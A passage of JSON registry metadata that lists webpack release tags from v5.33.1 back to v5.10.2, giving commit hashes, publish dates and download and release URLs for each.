ar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kind":"tag","published_at":"2021-03-19T16:46:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.0/manifests"},{"name":"v5.26.3","sha":"4ea8a435ace96cc6fe5c9b741bc14b68d75624a4","kind":"tag","published_at":"2021-03-17T13:38:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.3/manifests"},{"name":"v5.26.2","sha":"c67a73abbc3d3b333b31480bd7ac7a50e8b49e3e","kind":"tag","published_at":"2021-03-16T19:55:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.2/manifests"},{"name":"v5.26.1","sha":"ee09a9609bdebc25e52e785cef56f9698805599d","kind":"tag","published_at":"2021-03-16T14:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.1/manifests"},{"name":"v5.26.0","sha":"1def19ea8ab9921d1adaed30ba8f928badb133b5","kind":"tag","published_at":"2021-03-15T16:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.26.0/manifests"},{"name":"v5.25.1","sha":"58dfda2796edc57c9d18526053d6bcde6f06b8b7","kind":"tag","published_at":"2021-03-14T19:33:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.1/manifests"},{"name":"v5.25.0","sha":"be352e86b1c88893a62ffc2ada1c9294a016f5db","kind":"tag","published_at":"2021-03-12T07:49:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.25.0/manifests"},{"name":"v5.24.4","sha":"ef5e68141dc0fb6d02aa022194506cda878392c1","kind":"tag","published_at":"2021-03-08T09:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.4/manifests"},{"name":"v5.24.3","sha":"d044c857305fb48693bfa961bec3485d82ddef41","kind":"tag","published_at":"2021-03-03T19:07:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.3/manifests"},{"name":"v5.24.2","sha":"04a7d052b5c04628257ec23244f234622c7f394c","kind":"tag","published_at":"2021-02-24T20:20:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.2/manifests"},{"name":"v5.24.1","sha":"3849f45961c60d4bea91b4ef43bb7da7992a0c3a","kind":"tag","published_at":"2021-02-23T21:56:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.1/manifests"},{"name":"v5.24.0","sha":"63c14ccbfc6698cb974f8469e0a829ae1d8f44ec","kind":"tag","published_at":"2021-02-22T22:32:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.24.0/manifests"},{"name":"v5.23.0","sha":"7774d7ec632e66b8c6a8c0f320b3469e86ed5e26","kind":"tag","published_at":"2021-02-18T15:52:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.23.0/manifests"},{"name":"v5.22.0","sha":"f5bcac4a061897822bf10a8191231b5a71c59273","kind":"tag","published_at":"2021-02-15T09:00:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.22.0/manifests"},{"name":"v5.21.2","sha":"6661bd94fd724bb4610d348a1ffe48030dc56726","kind":"tag","published_at":"2021-02-07T18:27:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.2/manifests"},{"name":"v5.21.1","sha":"a1948fb2247adb5121ded5c3c4a04ed384b96c03","kind":"tag","published_at":"2021-02-06T09:39:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.1/manifests"},{"name":"v5.21.0","sha":"647aa17cc7fe16d382b3d48efc47258c4e96d699","kind":"tag","published_at":"2021-02-05T21:03:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.21.0/manifests"},{"name":"v5.20.2","sha":"f5a263750611f33adffb7644064b40b0432d6c65","kind":"tag","published_at":"2021-02-04T14:26:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.2/manifests"},{"name":"v5.20.1","sha":"82edd9150f8e54bab1497c9c29edc01bc39a88b4","kind":"tag","published_at":"2021-02-03T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.1/manifests"},{"name":"v5.20.0","sha":"181e045499c44c9855da56ce38ee5fecbe2998d2","kind":"tag","published_at":"2021-02-02T20:21:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.20.0/manifests"},{"name":"v5.19.0","sha":"3f7573c83ce53a486eff1439ba6fa9143ddbbf0b","kind":"tag","published_at":"2021-01-29T19:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.19.0/manifests"},{"name":"v5.18.0","sha":"16774961d4f9371251c96adf98618675eb032f30","kind":"tag","published_at":"2021-01-26T19:52:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.18.0/manifests"},{"name":"v5.17.0","sha":"d02e8daa267ca094fc0a030a595b000d35a99493","kind":"tag","published_at":"2021-01-22T14:01:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.17.0/manifests"},{"name":"v5.16.0","sha":"56246f0833333a8e277386b16408d8a3eeff553e","kind":"tag","published_at":"2021-01-19T18:39:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.16.0/manifests"},{"name":"v5.15.0","sha":"0a8bf41f169c53c0819f0f320db5957017ac58de","kind":"tag","published_at":"2021-01-15T15:53:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.15.0/manifests"},{"name":"v5.14.0","sha":"f87cafe91c251863cc3dc84ce81b60445f2a780d","kind":"tag","published_at":"2021-01-13T23:52:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.14.0/manifests"},{"name":"v5.13.0","sha":"a694cdfb82b5fd0a5c52102083a267a36446e03e","kind":"tag","published_at":"2021-01-11T22:30:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.13.0/manifests"},{"name":"v4.46.0","sha":"444e59f8a427f94f0064cae6765e5a3c4b78596d","kind":"tag","published_at":"2021-01-11T13:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.46.0/manifests"},{"name":"v5.12.3","sha":"a064b0ff3315db0d95124aaf5cc9b0a6add82926","kind":"tag","published_at":"2021-01-10T18:23:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.3/manifests"},{"name":"v5.12.2","sha":"88610d738ff78fa3fb7f859ee284c632bca42a24","kind":"tag","published_at":"2021-01-09T08:27:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.2/manifests"},{"name":"v5.12.1","sha":"62ec1546260d168cffd5dec8fc397c6e1159e4e4","kind":"tag","published_at":"2021-01-08T15:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.1/manifests"},{"name":"v5.12.0","sha":"74c9c72b873b27ec552cd6b85a9b578d6698e102","kind":"tag","published_at":"2021-01-08T12:58:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.12.0/manifests"},{"name":"v4.45.0","sha":"03313223fd4a0d4e570b8c79971e61b28cb3aeae","kind":"tag","published_at":"2021-01-08T12:53:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.45.0/manifests"},{"name":"v5.11.1","sha":"98bcf44a43d0109ac2680487fddf3c3262395e1f","kind":"tag","published_at":"2020-12-28T18:06:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.1/manifests"},{"name":"v5.11.0","sha":"f04328bad933fd9bacea389df17db96ffbd2336b","kind":"tag","published_at":"2020-12-17T15:59:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.11.0/manifests"},{"name":"v5.10.3","sha":"10ad4e95b850bbe20019275fd1d364666c4b69ea","kind":"tag","published_at":"2020-12-15T20:00:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.10.3/manifests"},{"name":"v5.10.2","sha":"c937292e6fb2e1e0a618d9d633f4184ec64cda75","kind":"tag","published_at":"2020-12-15T08:08:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webp